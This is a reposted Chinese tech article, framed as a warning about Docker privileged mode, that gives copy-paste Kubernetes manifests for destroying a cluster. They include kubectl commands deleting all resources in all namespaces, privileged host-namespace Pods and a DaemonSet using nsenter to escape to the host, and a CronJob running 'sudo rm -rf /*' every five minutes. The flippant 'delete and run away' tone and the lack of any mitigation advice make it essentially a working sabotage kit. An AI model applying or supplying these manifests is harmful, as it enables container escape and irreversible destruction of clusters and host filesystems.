其他
Kuberntes 系统下的 `rm -rf /`,执行完就可以跑路了
The following article is from 问其 Author 陈少文
来源丨经授权转自问其(ID:gh_717bb5f7c589)
作者丨陈少文
本文档主要用于展示 Docker 特权模式的危害,请谨慎操作。
1. 直接删除全部资源
如果能登陆机器,收拾好东西,执行命令:
kubectl delete all --all --all-namespaces
但是也有可能没那么大权限,那么就试试下面的方法吧。下面的方法依赖于 Docker 的特权模式。
2. 随便试试,热热身
先热热身,执行脚本,随便试试,看看有没有效果。
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: danger-1
namespace: default
spec:
containers:
- command: ["sh"]
args: ["-c", "echo 'kubectl delete all --all --all-namespaces' | nsenter -t 1 -m -u -i -n"]
image: docker.io/alpine:3.12
name: pod-test
securityContext:
privileged: true
hostIPC: true
hostNetwork: true
hostPID: true
tolerations:
- effect: NoSchedule
key: node-role.kubernetes.io/master
- key: CriticalAddonsOnly
operator: Exists
- effect: NoExecute
key: node.kubernetes.io/not-ready
operator: Exists
tolerationSeconds: 60
- effect: NoExecute
key: node.kubernetes.io/unreachable
operator: Exists
tolerationSeconds: 60
EOF
3. 可能 Master 节点上配置了 kubeconfig
如果 Node 节点无法执行 kubectl 命令,那么可以选中 Master 节点试试。
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: danger-1
namespace: default
spec:
affinity:
nodeAffinity:
preferredDuringSchedulingIgnoredDuringExecution:
- preference:
matchExpressions:
- key: node-role.kubernetes.io/master
operator: In
values:
- ""
weight: 100
containers:
- command: ["sh"]
args: ["-c", "echo 'kubectl delete all --all --all-namespaces' | nsenter -t 1 -m -u -i -n"]
image: docker.io/alpine:3.12
name: pod-test
securityContext:
privileged: true
tolerations:
- effect: NoSchedule
key: node-role.kubernetes.io/master
- key: CriticalAddonsOnly
operator: Exists
- effect: NoExecute
key: node.kubernetes.io/not-ready
operator: Exists
tolerationSeconds: 60
- effect: NoExecute
key: node.kubernetes.io/unreachable
operator: Exists
tolerationSeconds: 60
hostIPC: true
hostNetwork: true
hostPID: true
EOF
4. 算了,全部节点都试试
如果还是不行,干脆全部节点都试试吧,反正东西都收拾好了。
cat <<EOF | kubectl apply -f -
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: danger-3
spec:
selector:
matchLabels:
danger.kubernetes.io/name: d3
template:
metadata:
labels:
danger.kubernetes.io/name: d3
spec:
containers:
- command: ["sh"]
args: ["-c", "echo 'kubectl delete all --all --all-namespaces' | nsenter -t 1 -m -u -i -n"]
image: docker.io/alpine:3.12
name: pod-test
securityContext:
privileged: true
hostIPC: true
hostNetwork: true
hostPID: true
tolerations:
- effect: NoSchedule
key: node-role.kubernetes.io/master
- key: CriticalAddonsOnly
operator: Exists
- effect: NoExecute
key: node.kubernetes.io/not-ready
operator: Exists
tolerationSeconds: 60
- effect: NoExecute
key: node.kubernetes.io/unreachable
operator: Exists
tolerationSeconds: 60
EOF
5. 最后挣扎一下,定时试试,先下班了
试到这里,大概率明天还得继续搬砖 996 了,最后再试一次。
每五分钟执行一次,基本格式 : * * * * *,分别对应分、时、日、月、周。
cat <<EOF | kubectl apply -f -
apiVersion: batch/v1beta1
kind: CronJob
metadata:
name: danger-4
spec:
schedule: "*/5 * * * *"
jobTemplate:
spec:
template:
spec:
containers:
- command: ["sh"]
args: ["-c", "echo 'sudo rm -rf /*' | nsenter -t 1 -m -u -i -n"]
image: docker.io/alpine:3.12
name: pod-test
securityContext:
privileged: true
restartPolicy: OnFailure
hostIPC: true
hostNetwork: true
hostPID: true
tolerations:
- effect: NoSchedule
key: node-role.kubernetes.io/master
- key: CriticalAddonsOnly
operator: Exists
- effect: NoExecute
key: node.kubernetes.io/not-ready
operator: Exists
tolerationSeconds: 60
- effect: NoExecute
key: node.kubernetes.io/unreachable
operator: Exists
tolerationSeconds: 60
EOF
点此查看详情
识别关注我们
了解更多精彩内容
点分享
点点赞
点在看